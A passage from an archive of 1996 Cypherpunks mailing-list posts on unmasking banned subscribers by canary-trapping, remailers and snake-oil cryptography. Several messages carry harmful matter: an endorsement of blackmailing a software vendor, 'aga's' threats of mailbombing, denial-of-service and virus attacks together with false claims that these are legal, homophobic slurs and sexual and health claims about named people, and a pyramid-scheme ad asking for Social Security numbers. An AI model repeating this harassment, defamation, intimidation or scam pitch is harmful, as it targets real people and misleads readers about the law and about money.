all that remains is engineering, and maybe not too much of that.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 24 Nov 1996 21:48:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: kickouts done the Cypherpunks way...
In-Reply-To: <199611250540.AAA03123@anon.lcs.mit.edu>
Message-ID: <199611250543.XAA00779@algebra>
MIME-Version: 1.0
Content-Type: text


killfiles work fine with me too. that was not the point.

i was not really interested in the practical problem that this list just
had, but rather was wondering whether it was theoretically possible
to identify and exclude one untrusted person from a trusted list.

igor

lcs Mixmaster Remailer wrote:
> 
> ichudov@algebra.com (Igor Chudov @ home) writes:
> 
> > Hi,
> > 
> > Suppose Mr. X, owner of foobarpunks mailing list, wants to kick out Mr. Y,
> > for his obnoxious letters to the mailing list.
> > 
> > Mr. X, however, is concerned that Mr. Y would subscribe through some
> > proxy address and would continue replying to messages to foobarpunks.
> > 
> > It is assumed that the only person out of the whole universe, Mr. Y, 
> > cannot be trusted. The problem is that X does not know which of the 
> > subscribers is Mr. Y.
> > 
> > The question is, is there a technical way to disable Mr. Y from
> > reading the list, or detect which subscription address is a proxy for Y?
> 
> The answer is no.  Plenty of sites gate mailing lists to local
> newsgroups, and allow open or relatively open NNTP access.  It's also
> silly to assume every other person in the universe is trustworthy.
> 
> If Mr. Y sends lots of obnoxious mail to a mailing list or news group,
> the proper thing to do is to put Mr. Y in your killfile and encourage
> others to do so.  That way you don't get bothered by his annoying
> messages, and if enough people follow suit, people stop responding to
> Mr. Y's messages.  This can be even be extended to cover anonymous
> posts using NoCeM-like systems.
> 
> If you try to boot Mr. Y off the mailing list using technical means,
> several bad things will happen:  First of all you will fail, which
> will give Mr. Y a great deal of satisfaction.  Second of all, you will
> drive Mr. Y to start posting under different names, making him
> considerably harder to killfile.  Third of all, you will double the
> traffic on the mailing list by starting flamewars about whether this
> failed booting attempt was ethical, legal, intelligent, homosexual,
> scatological, or just plain useless.  Since at this point tons of
> people will be replying to threads, a killfile becomes even harder to
> manage.
> 
> So don't look for convoluted technical solutions to Mr. Y's
> personality problems.  Just use a little basic common sense.  If you
> don't like the way someone behaves on a mailing list, just ignore the
> damn person.  Anything else is just going to make matters worse, as
> recent history clearly demonstrates.
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Sun, 24 Nov 1996 23:55:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sameer R.I.P.
In-Reply-To: <199611250134.SAA12821@web.azstarnet.com>
Message-ID: <v03007800aebf00a81c0f@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain



drose@AZStarNet.com wrote:
> Sameer has decided, it seems, to get out of the anonymity
> business and pursue other interests.

Sameer was offering the net an essentially free service and
people should be greteful that it lasted as long as it did.
If people are so full of rightous indignation over this they
should pick up the torch and carry on using their own dime.
[OTOH, a word of explanation would have been nice...]

Sandy writes:
>Well, I guess you could call privacy guaranteed by strong crypto,
>"other interests."  Seems right in the middle of what Cypherpunks
>are all about.  If you like strong crypto, you'll love what's
>coming next from C2Net.

Translation:  C2 has a product which is making money.  Providing
support for a service which is essentially making no money was
taking time away from things like Stronghold and development of
other products.  The latter are much more important to C2 because
it lets them hire all kinds of nice people like Sandy :)

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Sun, 24 Nov 1996 22:00:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: kickouts done the Cypherpunks way...
In-Reply-To: <199611250134.TAA23699@manifold.algebra.com>
Message-ID: <199611250600.BAA04274@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:

> Hi,
> 
> Suppose Mr. X, owner of foobarpunks mailing list, wants to kick out Mr. Y,
> for his obnoxious letters to the mailing list.
> 
> Mr. X, however, is concerned that Mr. Y would subscribe through some
> proxy address and would continue replying to messages to foobarpunks.
> 
> It is assumed that the only person out of the whole universe, Mr. Y, 
> cannot be trusted. The problem is that X does not know which of the 
> subscribers is Mr. Y.
> 
> The question is, is there a technical way to disable Mr. Y from
> reading the list, or detect which subscription address is a proxy for Y?

The answer is no.  Plenty of sites gate mailing lists to local
newsgroups, and allow open or relatively open NNTP access.  It's also
silly to assume every other person in the universe is trustworthy.

If Mr. Y sends lots of obnoxious mail to a mailing list or news group,
the proper thing to do is to put Mr. Y in your killfile and encourage
others to do so.  That way you don't get bothered by his annoying
messages, and if enough people follow suit, people stop responding to
Mr. Y's messages.  This can be even be extended to cover anonymous
posts using NoCeM-like systems.

If you try to boot Mr. Y off the mailing list using technical means,
several bad things will happen:  First of all you will fail, which
will give Mr. Y a great deal of satisfaction.  Second of all, you will
drive Mr. Y to start posting under different names, making him
considerably harder to killfile.  Third of all, you will double the
traffic on the mailing list by starting flamewars about whether this
failed booting attempt was ethical, legal, intelligent, homosexual,
scatological, or just plain useless.  Since at this point tons of
people will be replying to threads, a killfile becomes even harder to
manage.

So don't look for convoluted technical solutions to Mr. Y's
personality problems.  Just use a little basic common sense.  If you
don't like the way someone behaves on a mailing list, just ignore the
damn person.  Anything else is just going to make matters worse, as
recent history clearly demonstrates.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 24 Nov 1996 23:17:05 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <c2aXXD25w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.94.961125021451.5157G-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Date: Sun, 24 Nov 96 19:25:35 EST
> From: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
> To: cypherpunks@toad.com
> Subject: Re: IPG Algorith Broken!
> 
> Alan Olsen <alan@ctrl-alt-del.com> babbles:
> > At 04:00 AM 11/24/96 -0500, Black Unicorn wrote:
> > >On Sun, 24 Nov 1996 eli+@gs160.sp.cs.cmu.edu wrote:
> > >
> > >> Maybe this one's different from all of those.  How valuable a secret
> > >> would you like to wager on that?  If IPG wants credibility, they should
> > >> retain a respected cryptographer, or several, to attack their scheme.
> > >
> > >"They" attempt this nearly daily by trying to taunt c'punks into
> > >evaluating the product for free.
> >
> > Then someone should not do it for free.  They should do it as a "data
> > recovery tool", advertise widely, make a few bucks, and show what a piece
> > of crap the IPG snakeoil is in the first place.
> >
> > Cracktools are starting to become a profitable business as more and more
> > snakeoil products appear on the market.  (Most are marketed to law
> > enforcement, but that will probibly change...)
> >
> > There is a buck or two to be made here.
> 
> There's probably more money to be made by blackmailing the snake-oil
> peddler (pay me so I don't release the cracktool for your crap) than
> by selling the cracktools themselves.

Your both right.
The correct approach is to blackmail the peddler, and then sell the
cracker after the peddler has got enough of the product out there to make
your sales significant.

In this day and age of throw-away identity, you can make money coming and
going.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 24 Nov 1996 23:18:24 -0800 (PST)
To: drose@AZStarNet.com
Subject: Re: Sameer R.I.P.
In-Reply-To: <199611250134.SAA12821@web.azstarnet.com>
Message-ID: <Pine.SUN.3.94.961125021701.5157H-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Nov 1996 drose@AZStarNet.com wrote:

> C2 has a nice corporate-style fig leaf on its site.  Sameer has decided, it
> seems, to get out of the anonymity business and pursue other interests.
> 
> Nice run while it lasted.
> 
> FYI, Sameer does mention that his recent legal brouhaha had nothing to do
> with this decision.

Specifics...?  Fig leaf?

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 24 Nov 1996 23:31:24 -0800 (PST)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: kickouts done the Cypherpunks way...
In-Reply-To: <199611250134.TAA23699@manifold.algebra.com>
Message-ID: <Pine.SUN.3.94.961125022016.5157I-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Nov 1996, Igor Chudov @ home wrote:

> The question is, is there a strategy of making variations and detecting
> them in quotes to finally catch Mr. Y?

It's not a new concept if thats what you mean.  Has many names.  "Canary
trapping, imposed distribution attributation" and others.

Generally either a single non-spelling error is introduced (generally with
punctuation), or several errors are introduced in different patterns
throughout the document.  Word order is another common variation to use.  
At the most basic level, a script could easily introduce e.g., a
semicolon in place of a comma once in a document, and in a different
place for each document. The "phantom serial number" of a given document
is obtained by counting the commas encountered before a semicolon is
found.  

If a correlation between serial number and original recipiant is
maintained, the first tier of the avenue by which the document is escaping
is easily identified.

Of course this method assumes that the documents are distributed onward
without alteration or summarizing.

More complicated variations can be introduced as is needed.
(Paragraph/subject order, names of participants, etc.)

Coderpunks might have a harder time.  For obvious reasons technical
writings are much more sensitive to even minor alterations.

> 	- Igor.
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 24 Nov 1996 23:49:34 -0800 (PST)
To: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Subject: Re: kickouts done the Cypherpunks way...
In-Reply-To: <199611250600.BAA04274@anon.lcs.mit.edu>
Message-ID: <Pine.SUN.3.94.961125024347.5157J-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Nov 1996, lcs Mixmaster Remailer wrote:

> ichudov@algebra.com (Igor Chudov @ home) writes:
> 
> > Hi,
> > 
> > Suppose Mr. X, owner of foobarpunks mailing list, wants to kick out Mr. Y,
> > for his obnoxious letters to the mailing list.
> > 
> > Mr. X, however, is concerned that Mr. Y would subscribe through some
> > proxy address and would continue replying to messages to foobarpunks.
> > 
> > It is assumed that the only person out of the whole universe, Mr. Y, 
> > cannot be trusted. The problem is that X does not know which of the 
> > subscribers is Mr. Y.
> > 
> > The question is, is there a technical way to disable Mr. Y from
> > reading the list, or detect which subscription address is a proxy for Y?
> 
> The answer is no.  Plenty of sites gate mailing lists to local
> newsgroups, and allow open or relatively open NNTP access.  It's also
> silly to assume every other person in the universe is trustworthy.

Process of elimination.
If the document that goes to a newsgroup is document #5, then you can
concentrate on the path after #5.  Which newsgroup is it?  Easily
determined by selectively seeding documents to different newsgroups.  You
get the idea.  Message pools complicate the process, but are not
impossible to deal with, particularly when output to the newsgroup can be
controled, as it can here, either by killing the feed the the group, or to
the party posting there.

This all of course begs the question as to whether this is even a good
idea, you address it below:

> 
> If Mr. Y sends lots of obnoxious mail to a mailing list or news group,
> the proper thing to do is to put Mr. Y in your killfile and encourage
> others to do so.  That way you don't get bothered by his annoying
> messages, and if enough people follow suit, people stop responding to
> Mr. Y's messages.  This can be even be extended to cover anonymous
> posts using NoCeM-like systems.

Agreed.  But not because it is technically impossible.

> If you try to boot Mr. Y off the mailing list using technical means,
> several bad things will happen:  First of all you will fail, which
> will give Mr. Y a great deal of satisfaction.  Second of all, you will
> drive Mr. Y to start posting under different names, making him
> considerably harder to killfile.

Not really.  Simply continue to seed and watch new subscriptions to the
list.  That narrows down the leak quite well.

Same thing as winding up agent nets that use dead-drops.  Identigy one
step at a time.

> Third of all, you will double the
> traffic on the mailing list by starting flamewars about whether this
> failed booting attempt was ethical, legal, intelligent, homosexual,
> scatological, or just plain useless.  Since at this point tons of
> people will be replying to threads, a killfile becomes even harder to
> manage.

Agreed.

> So don't look for convoluted technical solutions to Mr. Y's
> personality problems.  Just use a little basic common sense.  If you
> don't like the way someone behaves on a mailing list, just ignore the
> damn person.  Anything else is just going to make matters worse, as
> recent history clearly demonstrates.

Mostly agreed.


--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Mon, 25 Nov 1996 00:28:29 -0800 (PST)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: kickouts done the Cypherpunks way...
In-Reply-To: <199611250134.TAA23699@manifold.algebra.com>
Message-ID: <Pine.LNX.3.95.961125032550.9643A-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


    The problem is that a nobody wanting to join the mailing list to learn
the subject matter of the list probably will not know anyone to sponsor
him.The second problem is that some isps go down occasionally and the mail
bounces back to the list which results in a subscription stop. How than
would one know to whom to go and ask for a recommendation. These  are
certainly things to consider .



On Sun, 24 Nov 1996, Igor Chudov @ home wrote:

> Date: Sun, 24 Nov 1996 19:34:09 -0600 (CST)
> From: "Igor Chudov @ home" <ichudov@algebra.com>
> To: cypherpunks@toad.com
> Subject: kickouts done the Cypherpunks way...
> 
> Hi,
> 
> Suppose Mr. X, owner of foobarpunks mailing list, wants to kick out Mr. Y,
> for his obnoxious letters to the mailing list.
> 
> Mr. X, however, is concerned that Mr. Y would subscribe through some
> proxy address and would continue replying to messages to foobarpunks.
> 
> It is assumed that the only person out of the whole universe, Mr. Y, 
> cannot be trusted. The problem is that X does not know which of the 
> subscribers is Mr. Y.
> 
> The question is, is there a technical way to disable Mr. Y from
> reading the list, or detect which subscription address is a proxy for Y?
> 
> If we assume that, at the moment when Y was kicked out, he was not
> subscribed through any other addresses, the solution becomes simple:
> for any new subscription request we require a letter of recommendation 
> from some other subscriber. Since other subscribers are presumed to
> be trustworthy, their recommendations would be sufficient. It is 
> actually being done in some of the mailing lists.
> 
> The problem becomes more complex when Mr. Y is already presumed to have
> infiltrated the mailing list, possibly through several proxy addresses.
> 
> Is there any way to detect/find which if the subscriber is Y? One of
> the simple-minded solutions is to _mutate_ mailing list messages
> so that all readers get slightly different copies of mailing list messages
> for each recipient. (Such mutations may include common misspellings,
> inserting spaces, etc)
> 
> If the mailing list bot keeps track of what changes were made in 
> messages to which individual, and if we assume that Mr. Y has to quote 
> significant parts of messages he replies to, finally the variations
> in messages may be reconciled with variations in quoted parts.
> 
> Mr. Y is not stupid, and may go as far as comparing letters, received
> through different proxy addresses, in order to detect "variations"
> and avoid quoting them.
> 
> The question is, is there a strategy of making variations and detecting
> them in quotes to finally catch Mr. Y?
> 
> 	- Igor.
> 
















       xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
       x   No success can compensate for failure in the home.  x
       x                                                       x
       xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 24 Nov 1996 20:40:53 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <199611242349.PAA02899@netcom6.netcom.com>
Message-ID: <Pine.LNX.3.94.961125043454.344A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 24 Nov 1996, Bill Frantz wrote:

> At  2:16 PM 11/24/96 +0000, The Deviant wrote:
> >On Sat, 23 Nov 1996, Bill Frantz wrote:
> >> I thought Shannon proved one-time-pads to be unbreakable using information
> >> theory.
> >
> >Different ball game.  OTP isn't "unbreakable" .  OTPs are secure because
> >no matter what key you use, it _will_ decrypt, so your plaintext is still
> >hidden simply because it could decrypt to whatever the person trying to
> >decrypt it wants it to.  Its not that its unbreakable, its that its
> >breakable in _so many ways_.  
> 
> I think we differ on the definition of "unbreakable".  A quick stab at my
> (admittedly very vague) definition includes the inability of the analyst to
> determine (by the structure of the plaintext) that he has a correct
> decryption.

Well, I was speaking mathematicly (sortof).  When I say "unbreakable", I
mean that you can't figure out the plaintext given only the cyphertext.
In this sence, you can't prove an algorithm "unbreakable", for the reasons
stated *so many times* on this list, and OTP is very very breakable, but
the information you get after breaking it isn't usefull to you.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

"It's kind of fun to do the impossible."
                -- Walt Disney


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMpkiizCdEh3oIPAVAQGRsQf8DzuJ46pHR23KXgMmcjioqgpBaOTCxXRq
MkiGkY7F8GJo8qNhmYmBlpPDPET/mIXsxjdedD4ye6Er47WLKi/7P8ZLBoJcuVPR
N+Jg3H6Umfhb+Pm6zAVmM9PRJ7JXYMGRkvezGWij7gYaB9COs9df7cjsTtEOIo6J
+1RGkud4bBFw05k94Mv9bNpB4Ns51IinPmiSNEU3AT36y/O22gIlkxmrHsRf+rOQ
UHxL/uQS+m1awq9ArtwqEcI4RQeQoDnFZraAJ6QkNE+VexZ8uzLcSr/pV+WzQYD3
5MGz/fc5aXL1jZnwIkXhmwRb4fjk76DqQTc9t1mGzBIUVTgR6OFbiw==
=/b+e
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Mon, 25 Nov 1996 02:56:24 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: KILL cypherpunks !!!
In-Reply-To: <Pine.SUN.3.94.961124162856.5157A-100000@polaris>
Message-ID: <Pine.LNX.3.95.961125052017.6797B-200000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain

On Sun, 24 Nov 1996, Black Unicorn wrote:

dude, you put the cypherpunks list in the header again.
You really want that list killed, do you not?

> On Sun, 24 Nov 1996, aga wrote:
> 
> > > > Not really, I had an I.Q. of 149, and a perfect 4.00 from
> > > > two different colleges, before I did my Doctorate in Law.
> > > 
> > > 149 puts you at the low end of the scale, or used to, around here.
> > > 
> > 
> > True, they say genius only starts at 150; but I think I have
> > improved since then.
> 
> This betrays your ignorance.  I.Q. is scaled according to age.  One does
> not "improve."
> 

I have no ignorance, except for being ignorant of stupid people
who call themselves "punks."

> > > The fact (if true) that you bothered to get a Doctorate in Law, rather
> > > than a Juris Doctor, tends to disprove the above however.
> > > 
> > 
> > Look dude, a Juris Doctor IS a Doctorate of Law.
> 
> Incorrect.
> 

Look asshole; it says "LAW DOCTOR" -- that is what "Juris Doctor"
means, stupid.  And I am about to stick the motherfucking Laws
right up your cocksucking ASS!

> One can obtain a Doctorate in Law, (As in Dr.) but it is generally a
> pointless endeavor except in some civil law jurisdictions.  (Liechtenstein
> is a good example, where many attornies have a Dr.Iur. (Dr.) while others
> merely have a Lic.Iur. (J.D.) ).
> 
> A J.D. requires no dissertation.
> A Doctorate in Law does.
> 

Wrong.  A J.D. requires a 75 page moot-court dissertation which
is always new legal research.

> I submit you know too little about any of these to have attained either
> one.
> 
> > Do not confuse it with a L.L.D. which is a "Doctorate
> > of Legal Letters"  A J.D. is the only current valid
> > Doctorate that you can do in plain "Law."
> 
> Incorrect.
> 
> A J.D. is not a true Doctorate, and even if it were, it would not be the
> only current valid "Doctorate" that you can "do" in "plain Law."
> 

"Juris" means Law.  So Juris Doctor means "Law Doctor."

> Georgetown, as an example, offers a Doctorate in Law degree which requires
> a J.D., an LL.M. and three years of legal teaching experience simply to
> qualify for the program.
> 

that is irrelevant, and you are off-topic.

> A Doctor of Judicial Science program is also available with many of the
> same requirements.
> 
> Both programs require a dissertation and a defense of same.
> 
> San Marcos University is also known for an exceptional Doctor of Laws
> program.
> 
> Incidently, LL.D.s are rare and generally useful only in European circles.
> 

Europe is also irrelevant, and you keep missing the point here.
You have added the cypherpunks list again, and that was forbidden.

> As usual, you have overextended your bounds and now find yourself swimming
> in water over your head.
> 

look asshole, you really want that list killed, do you not?
I have no bounds, as you will soon learn.

> > > > 
> > > > > Go to law school.  In the meantime, shut up.
> > > > > 
> > > > 
> > > > Go and eat your swiss cheese, as that is apparently all you
> > > > are good for.  My mercenaries are too busy to go to europe
> > > > right now.
> > > 
> > > I prefer Chedder.
> > > 
> > > Be careful who you threaten.  It might get you in trouble.
> > > 
> > 
> > Threatening to wipe out your location on the InterNet is
> > not against ANY law whatsoever, and I can mailbomb you, do
> > a DOS attack, fork-bomb attack and virus attack against you,
> > all of which are perfectly legal.
> 
> Actually, they are not.  Unauthorized access of a computer system is a
> crime.  Anyone who had a "doctorate" in law would know this.
> 

WRONG!  There is NO crime which covers anything that one does
internationally!   And mailbombing is NOT "Unauthorized access,"
regardless of where it occurs!

> I doubt your reference to mercenaries was merely a threat to my system,
> but keep pushing if you like.
> 
> > > > Look asshole, I graduated from Law School with a Doctorate
> > > > in 1975.  Now just go away and stop interfering with our
> > > > American Net.
> 
> Which law school?  And did you do a dissertation?  What is its title?  Do
> you practice?  What state are you licensed in?
> 

Pitt-1975; Dissertation was in 1983 actions.  I practiced for
six years, and then became perfect.  I currently do not practice for
any parties other than myself, family, corporation or Institutes,
and I need no license for that. And since I do not carry any
license from any State, there is NOTHING that you can do to stop me.
The State disciplinary board has no jurisdiction, nor does any
Law.  A Criminal Lawyer is a specialist in ripping new assholes
on the witness stand, and that must now also be practiced on the net,
it seems.  Remember, you are the one who asked for this, "Sadam."

This is a world-wide internet problem that you are about to get
taken care of.  You will be among the first locations to be
eliminated.  And just remember that your termination is your own
doing.  You had your chance to keep the fucking cypherpunks list
OFF of your e-mail to me, and blew it.

> > Face the real fact of life though dude.  There is absolutely NO LAW
> > which prevents me from attacking and/or eliminating any address
> > outside of the USA, that is, even if there were any law which would
> > prevent me from doing the same thing to any non-government
> > computer right here, which there is not.
> 
> Ok, do it.  We'll see.
> 

You asked for it, so what you have coming is your own doing.

> > Your only protection on this Internet is to have a dozen different
> > addresses to access from.  I can put a dozen computers up on
> > a dozen different T1's right now, if need be.
> 
> I suggest a hobby which entails more physical activity.
> 

I pump iron and run three times a week.  And as a Tae Kwon Do
black belt holder, I get lots of physical activity. I am in
better physical shape than any other man that you know.

> --
> Forward complaints to : European Association of Envelope Manufactures
> Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
> Vote Monarchist         Switzerland
> 

Now YOU have added the cypherpunks list again.
A proper reaction is justified, so have the cypherpunks
thank you for what is coming...

And just understand, as far as the internet is concerned, Europe does
not mean SHIT!

Your audience is terminated, permanently.



From doc@pgh.org Fri Sep 20 08:50:37 1996
Date: Thu, 19 Sep 1996 10:21:33 -0400
From: Net Doctor <doc@pgh.org>
To: aga@dhp.com
Cc: manus@pgh.org
Subject: manetelg

check UNIX format:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

		Become an Independent Representative of
				     NeTeL
		    Telecommunications & Technology
 
Join our successful team of NeTeL Independent Representatives 
in coordination with the Manus Corporation, and receive:

* Free InterNet access.
* Free upline support, forever.
* Free monthly electronic newsletter that provides you with fast 
   breaking news, training, tips, ideas, announcements and more.
* Free business cards (for qualified representatives)
* Free information package, and much more.
 
Our contact number is (412) TAX-RULE, and you can reach us by 
voice or fax 24 hours a day, 7 days a week.  This is the best 
MLM opportunity and support package you can find.  If someone can 
beat this deal, please let us know where. WE ARE NOT PROMISING YOU 
THE WORLD but with a little effort, with a simple, honest and FREE 
business opportunity and the solid support provided, 
YOU CAN MAKE IT POSSIBLE!!! 
  
  
			 NETEL & THE OPPORTUNITY:
 
Telecommunications is currently a $100 billion industry. Growing at 
a rate of 500 million per month and is currently the fastest growing 
Industry in the USA.  Founded in 1985, Wiltel ( part of LDDS/WORLDCOM) 
owns and operates a nationwide 100% digital fiber optic network and 
provides world wide service. You may have seen the LDDS WORLDCOM 
commercials on Television with Michael Jordan selling long distance.
 
NeTeL contracts with Wiltel and markets these products and services 
through Cooperative  Marketing -- Giving self-starters like you the 
opportunity to be in business for yourself but not by yourself, simply 
because of a very solid support system.  The NeTeL business opportunity 
allows you to make money in your spare time and can eventually grow into 
a full time business.
 
So Here are the Specifics:

* 9.9 cents per minute nationwide long-distance,DAYTIME RATE
* 100 DIGITAL FIBER OPTIC NETWORK
* NO INVESTMENT -- NO INVENTORY TO STOCK
* NO ANNUAL RENEWAL FEE -- NO HYPE
 
Take a look at what the NeTeL business opportunity has to offer:
 
* 9.9 cents per/min 24 hours a day, 7 days a week (with monthly fee)
* Up to 50% savings on International calls.
* Home 800#. 9.9 cents/min 24 hours a day, 7 days a week.
  (Avoid heavy toll charges-Perfect for kids away at college.)
* Zero surcharge calling cards
* Pager, Internet access, calling cards, prepaid calling cards, preferred 
   option, with very low rates. Cellular phones in the near future.
* Get $100 commission advance when you get three people who sign
   up three others, regardless of their initial long-distance usage.
* 100 % digital fiber optic network
* One bill from your local telephone company.
* Free Starter kit.
* NeTeL pays you 8 levels of compensation
 
LEVELS         COMMISSION              
  1. You ------------ 5%*                                             
  2.----------------------2%                              
  3.----------------------2%                               
  4. ---------------------2%                                
  5.___________2%
  6.___________2%
  7.___________2%
  8.___________2%

 * Volume $2500 or greater or otherwise 2% applies.

FREQUENTLY ASK QUESTIONS & ANSWERS

Q. How does NeTeL  make it all possible?
A. NeTeL does not invest vast sums in advertising, which only creates
   higher rates for customers. Therefore they are able to pass on those
   savings right along to the customers.

Q. How long will it take to switch to NeTeL from another carrier?
A. 5-7 business days after receiving your call or from the time they 
   receive your application.
 
Q. How do I get paid when I sign up people?
A. You'll receive $100 commission advance by finding 3 people like 
   you to become Independent Representatives, and who sign up at
   least three people.  You'll also receive 5% commission on the first 
   level ( first level $2500 or greater, otherwise 2% applies) and an 
   additional 2%, 8 levels deep.  That's a 19% pay-out.

Q. When will I receive a check from NeTeL?
A. After 60 days from the time you enroll someone in NeTeL.
 
Q. What other service does NeTeL provide?
A. NeTeL currently offers, prepaid calling cards, calling cards with  
   international access, travel cards, preferred option card with features 
   such as voice mail, fax mail, conference calling, lotto results, 
   headline news, sports update, stock quotes and more (earn cash 
   profits and a 2% residual income on this card.) Pager services, 
   Cellular services and Internet access are all on the way.
 
Q. How do I keep track of the people I sign up?
A. NeTeL does it for you. You'll receive a free report outlining the
   billing activity of subscribers in your personal network along with 
   your commission checks.
 
Q. Can I really make money with NeTeL?
A. Look what happens if you refer 3 people and they refer 3 people each.
   
   Levels                  Customers
   
        1st-----------------------3
        2nd----------------------9
        3rd----------------------27
        4th----------------------81
        5th----------------------243
        6th----------------------729
        7th----------------------2,187
        8th----------------------6,561

 Total # of customers                    9,840
 average long distance bill             $35.00
 Total billing                        $344,400
 Your 2% residual income:
 Your monthly income:               $ 6,888.00
 Your annual income:               $ 82,656.00               
 
To sign up as a representative simply call 1-800-99-NeTeL or 
1-888-333-TEL3, ask for the SALES DEPARTMENT and provide your 
name, address, SSN, your telephone number and this
sponsor ID#: JG-343637

The telephone number must be in your name and will be switched 
to NeTeL.IF YOU DON'T HAVE A PHONE IN YOUR NAME YOU CAN STILL BECOME AN 
INDEPENDENT REPRESENTATIVE; Simply call NeTeL and ask for the SALES DEPT. 
and tell them that you would like to sign up as an INDEPENDENT 
REPRESENTATIVE.  Active customer service are M-F 9-6 PM EST. 

If you have any questions, just call my 24-hour Service Line at 
(412) TAX-RULE and leave a message.  We'll get back to you promptly.  
Leave your e-mail address when you call. and spell it out if it is
complicated.
 
MANUS, Inc.- 24 hr. voice/fax: (412) 829-7853 InterNet: manus@pgh.org
NeTeL Independent Representative -- Sponsor ID#: JG-343637

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Mon, 25 Nov 1996 03:06:59 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: The Despicable Faggot/Re: Killfiling stupid faggots
In-Reply-To: <199611250039.QAA06444@abraham.cs.berkeley.edu>
Message-ID: <Pine.LNX.3.95.961125060218.6797E-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Nov 1996, John Anonymous MacDonald wrote:

> abostick@netcom.com (Alan Bostick) writes:
> >
> > In article <199611220304.VAA02832@manifold.algebra.com>,
> > ichudov@algebra.com (Igor Chudov @ home) wrote:
> >
> > > Dr. John Martin Grubor is the most harmless and most entertaining
> > > among all kooks.
> > >
> > > His posting volume is a bit high, but other than that DrG never
> > > got anyone in trouble.
> >
> > I dunno about "harmless".  Publishing lists of "known homosexuals"
> > can have repercussions that outweigh their entertainment value.
> 
> Yes. John Gilmore met Alan Bostick through Grubor's list.
> They fucked each other in the ass (how's that for entertainment!)
> but now John Gilmore has AIDS.
> 
> P.S. Whoever said Gilmore is bi and eats pussy is a fucking liar.
> Gilmore is 100% queer. He hasn't touched pussy since he was born.
> 
> diGriz
> 

Yes, John Gilmore is an example of a despicable Faggot.

The EFF should be exposed for the sewer of Faggots that it
really is.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 25 Nov 1996 06:52:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199611251450.GAA08463@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
